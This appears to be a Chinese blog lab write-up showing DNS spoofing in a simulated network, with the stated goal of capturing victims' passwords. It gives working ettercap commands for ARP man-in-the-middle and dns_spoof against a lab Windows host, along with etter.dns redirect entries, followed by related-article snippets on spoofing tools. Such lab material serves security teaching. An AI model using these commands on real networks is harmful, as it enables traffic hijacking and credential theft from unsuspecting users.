DNS欺骗

最新推荐文章于 2024-02-02 17:53:54 发布
最新推荐文章于 2024-02-02 17:53:54 发布
阅读量1.8k 收藏 3
点赞数 3
分类专栏: 网络协议安全 文章标签: linux 安全 网络协议 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/honest_run/article/details/122134065
版权

目的:获取被攻击者的账号密码

使用设备:

                ENSP

                VM虚拟机

Ensp配置(路由器:AR2220,交换机S5700)

云配置:

Kali

Win7

Win server 2018

192.168.10.10

192.168.10.20

192.168.20.10

网卡VM8

网卡VM1

网卡VM2

Server-Server2配置(DNS服务器):

目的:配置IP、掩码、网关

        目的:开启DNS服务,增加域名和IP地址对应的DNS条目

                   使其他设备可以通过域名进行访问

VM虚拟机配置

kali配置:

Win7配置:

Win server配置:

1.1 然后先搭建Web服务

1.2 配置Web主页,进入到Web服务器的根目录,将Web主页复制到这个目录下

(其余具体配置可参照ARP欺骗实验和IP重定向实验配置)

开始实验

2.1 在Win7上安装火狐浏览器,开始访问web服务

此时访问是成功的(IP或者域名)

2.2 在kali上进行攻击

命令1: vim /etc/ettercap/etter.dns

        进入编辑界面最后一行(shift+G)

        www.abc.com A 192.168.10.10

注释:www.abc.com(域名)

        192.168.10.10(kali IP地址)

目的:将  www.abc.com (此域名)引流到 192.168.10.10(kali IP地址)

命令2:service apache2 start

目的:在kali上开启apaceh服务

验证:浏览器输入IP访问 192.168.10.10(kali的IP地址)

命令3:ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.10.20// /192.168.10.254//

注释:T文本模式怡示

         P非混杂模式

        -M中间人攻击

        remote为双向模式,同时欺骗通信的双方

        -P调用dns_spocof插件进行dns欺骗攻击

        192.168.10.20为目标主机IP(win7的IP地址)

        192.168.10.254为网关的IP地址

以上命令其实是实现了两次欺骗攻击,一次是ARP欺骗,一次是DNS欺骗:

        ARP欺骗的目的是将win7的DNS解析请求报文发送到kali

                (MAC地址——引流)

        DNS欺骗目的是给win7回复错误的DNS解析结果

2.3 在win7 上查看实验结果

命令4:ping www.abc.com

结论:可以看到回复地址为192.168.10.10(kali的IP地址),实验成功,可以在win7上进行域名访问,结果如下图:

注:如果win7使用浏览器通过域名(www.abs.com)访问网页还是没有变化(DNS缓存没有清除),则使用命令:ipconfig /flushdns。

命令:ipconfig /flushdns的作用

        ipconfig /flushdns 这是清除DNS缓存用的

来自 <ipconfig /flushdns 清除系统DNS缓存_chenlycly的专栏-CSDN博客_dns flush>

xjizhi(GG安全)
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络攻防技术——DNS欺骗
学习记录
02-28 5157
一、题目 本实验的目标是让学生获得对DNS(域名系统)的各种攻击的第一手经验。DNS是互联网的电话簿;它将主机名转换为IP地址,反之亦然。这种转换是通过DNS解析实现的,这种解析发生在幕后。DNS欺骗攻击以各种方式操纵此解析过程,目的是将用户误导到其他目的地,这些目的地通常是恶意的。本实验室主要研究几种DNS欺骗攻击技术。学生将首先设置和配置DNS服务器,然后在实验室环境中的目标上尝试各种DNS欺骗攻击。 第一个大实验任务(本地DNS欺骗)中进行的攻击假设攻击者位于同一本地网络上,因此可以嗅探DNS数据包。
Windows下DNS ID欺骗的原理与实现
11-16
局域网内的网络安全是一个值得大家关注的问题,往往容易发起各种欺骗攻击,这是局域网自身的属性所决定的–网络共享。本文所讲解的DNS ID欺骗是基于ARP欺骗之上的网络攻击,如果在广域网上,则比较麻烦。不过也有一些例外情况:如果IE中使用代理服务器,欺骗不能进行,因为这时客户端并不会在本地进行域名请求;如果你访问的不是网站主页,而是相关子目录的文件,这样你在自定义的网站上不会找到相关的文件,登陆以失败告终。如果你不幸被欺骗了,先禁用本地连接,然后启用本地连接就可以清除DNS缓存。
DNS欺骗-教程详解
wzhua的博客
08-10 5487
DNS欺骗-教程详解,有环境下载链接
网络安全基础——DNS欺骗
m0_57077614的博客
12-22 1955
DNS欺骗 原理+实操
网络协议与攻击模拟_14DNS欺骗
最新发布
fencecat的博客
02-02 1440
DNS欺骗就是利用某种方式将我们访问的域名解析到其他服务器上,从而使得我们无法正常访问到原本我们想要访问的网站。
解析中间人攻击--DNS欺骗
04-24 4224
DNS欺骗   DNS欺骗是这样一种中间人攻击形式,它是攻击者冒充域名服务器的一种欺骗行为,它主要用于向主机提供错误DNS信息,当用户尝试浏览网页,例如IP地址为XXX.XX.XX.XX ,网址为www.bankofamerica.com,而实际上登录的确实IP地址YYY.YY.YY.YY上的www.bankofamerica.com ,用户上网就只能看到攻击者的主页,而不是用户想要取得的网
DNS欺骗实验过程和分析
记录学习,一起进步
11-13 1556
基于DNS欺骗实验操作和分析过程
dns欺骗教程
05-01
dns欺骗教程 有图有真相!
DNS欺骗源代码
04-11
局域网内dns欺骗的实现代码,已经实现,可以直接运行使用。
dnschef实现dns欺骗
04-13
DNS欺骗【下】----dnschef实现 https://blog.csdn.net/redwand/article/details/105495873
Kali linux与ENSP综合实验(实现ARP攻击和欺骗
王先生的蒋小姐的博客
05-06 8359
什么是ARP 地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各...
局域网安全DNS欺骗
qq_43665434的博客
02-11 667
局域网安全DNS欺骗 参考文章: 什么是DNS? 实验环境 靶机win10 192.168.31.212 kali 192.168.31.250 准备: 用到kali中的ettercap工具 编辑配置文件 vim /etc/ettercap/etter.dns 设置欺骗域名与IP的映射关系 编辑网页文件 vim /var/www/html/index.html 根据自己需要编写即可 开启apache服务 service apache2 start 查看apache服务状态 service a
用winpcap实现局域网DNS欺骗之一(基础知识)
leotangcw的专栏
05-23 6242
          随便转载,转载请注明出处http://blog.csdn.net/leotangcw/    欢迎大家和我交流Email:tangchengwen@163.com     学校网络中心的老师叫帮忙做一个DNS欺骗的软件。主要用于在学校网络出现问题时把大家的上网请求都转向到一个通知网页上。关于DNS欺骗网上已经有很多文章了,不过实例还是比较少的,特别是使用我们经常使用
解析常见网络钓鱼攻击方法
热门推荐
oez9376的博客
03-31 1万+
钓鱼攻击使用多种技术,一封电子邮件信息或网页的显示同其运行表现出欺骗性差异。下面列出了一些较为常见攻击技术。
ettercap局域网内DNS欺骗(隔壁的哥们轻一点 ...)
aozhuo4755的博客
12-13 1847
笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的。 而ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。 笔记二:DNS简单说明 了解DNS是什...
[渗透笔记][中间人] dns欺骗原理及实验
H4ppyD0g的博客
02-07 916
所有内容仅作为个人学习和实验使用,请勿用于非法用途,后果自负! dns欺骗原理 我们通常都是输入包含域名的url而不是直接输入要访问的ip,因为ip难以记住。 计算机上网访问网路资源时,首先会通过本地的hosts中的域名ip映射查询我们输入的域名的ip,如果有的话就直接访问那个ip;如果没有就会去找dns服务器解析一下。 如果个人对自己的电脑进行dns欺骗的话就直接修改本地的hosts文件就可以...
华为模拟器ENSP——DNS域名解析实验
qq_55660605的博客
03-24 6040
huawei——ensp(DNS实验)简单
DNS欺骗原理
米莱虾
09-01 2278
用伪装的DNS服务器截获请求域名的IP,再发送给伪装的web服务器。查询特定域名的IP时,将得到伪造的IP,打开事先准备好的虚假页面
ettercap+dns欺骗
09-16
ettercap是一种开源的网络安全工具,可以用于执行各种网络欺骗攻击,包括DNS欺骗DNS欺骗是一种常见的攻击技术,它允许攻击者篡改网络中的DNS响应,将用户的网络流量重定向到恶意的网站或服务器上。 要使用ettercap进行DNS欺骗,您需要进行以下步骤: 1. 配置ettercap:首先,您需要配置ettercap来监听网络流量并执行攻击。您可以使用ettercap命令行工具或图形界面工具来完成此操作。 2. 扫描网络:使用ettercap扫描网络,找到目标主机和潜在的受害者。这将帮助您确定哪些主机可以进行攻击。 3. 启动DNS欺骗:一旦您找到目标主机和潜在的受害者,您可以使用ettercap来执行DNS欺骗。通过篡改DNS响应,您可以将受害者的流量重定向到您选择的恶意网站或服务器上。 4. 窃听和篡改流量:一旦DNS欺骗成功,ettercap将会窃听受害者的流量,并且您可以选择篡改数据包以执行其他类型的攻击,如中间人攻击或数据包嗅探。 请注意,DNS欺骗是一种违法和不道德的行为,只能在合法的渗透测试或授权的安全评估中使用。未经授权地执行DNS欺骗可能会导致严重的法律后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值